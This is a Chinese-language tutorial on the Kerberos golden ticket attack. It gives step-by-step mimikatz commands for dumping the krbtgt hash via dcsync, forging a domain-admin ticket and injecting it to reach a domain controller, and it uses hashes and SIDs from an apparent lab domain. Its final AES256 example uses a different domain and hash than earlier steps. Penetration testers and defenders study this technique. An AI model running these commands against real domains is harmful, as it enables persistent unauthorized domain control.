域内横向移动技术——黄金票据攻击

一、黄金票据攻击介绍

黄金票据（golden ticket）攻击，是一种为任意用户生成TGT票据的方法，属于一种后门。黄金票据生成，是生成有效的TGT Kerberos票据，并且不受TGT生命周期的影响（TGT默认10小时，最多续订7天），那么，这里可以为任意用户生成黄金票据，就可以为域管理员生成TGT，普通用户就可以变成域管理员。

制作域管的TGT票据，首先需要获取Krbtgt账户的密码hash，而Krbtgt账户的密码hash存储在域控制器上，因此需要活动域管理员权限。
综上，是个死循环，所以黄金票据攻击，并不是一种普通的攻击方式，该攻击方式其实是一种后门的形式，属于第二次进行攻击的方法，第一次拿到域管权限之后，需要将krbtgt hash进行保存，当第二次再来进行渗透攻击时，我们就可以使用krbtgt hash制作黄金票据，从而获得管理员权限。

1.获取Krbtgt的hash
首先以管理员权限，在域控制器上执行mimikatz命令：
privilege::debug
lsadump::dcsync /user:krbtgt
记录Krbtgt用户的以下信息：
Hash NTLM: 4c32d497137ce2fbc28c297e73a87889
aes256_hmac: 414818be77de302b3801226cfe04599fb9aabfe114231a29d1386ee4d6507067
2.域sid
在普通域成员机器上，使用 “whoami /user” 获取。
记录普通域用户id信息:
student01:S-1-5-21-3792756393-3386897061-2081858749
3.域账户
域账户：student01
4.域名
在普通域成员机器上，使用 “systeminfo” 获取。
记录域名：college.com

Hash NTLM：4c32d497137ce2fbc28c297e73a87889
域名：college.com
域账户：student01
域sid：S-1-5-21-3792756393-3386897061-2081858749

在获取上面信息后，使用mimikatz工具生成黄金票据（普通域用户权限即可制作），过程如下：
1.查看当前票据
kerberos::list
2.清空票据 #防止之前的票据对新作的票据产生影响
kerberos::purge
3.制作黄金票据 /admin:用户名任意 /ticket:票据名称任意即可
kerberos::golden /admin:administrator /domain:college.com /sid:S-1-5-21-3792756393-3386897061-2081858749 /krbtgt:4c32d497137ce2fbc28c297e73a87889 /ticket:ticket.kirbi

会在当前目录下生成黄金票据：
4.导入黄金票据
kerberos::ptt ticket.kirbi
kerberos::list
5.在普通域用户机器上，重新打开cmd窗口，可以直接列出域控目录
dir \dc.college.com\c$
6.使用aes256也可以制作黄金票据。
原理和上面的是一样的，只是hash不同而已。
kerberos::golden /domain:school.com /sid:S-1-5-21-2236738896-1661306322-1924668396 /aes256:87d3913d6cb96fef6fcc7a616ee33625bec4b8cffc7a2efa7f177541dd7d3d9c /user:hello /ticket:aes256.kirbi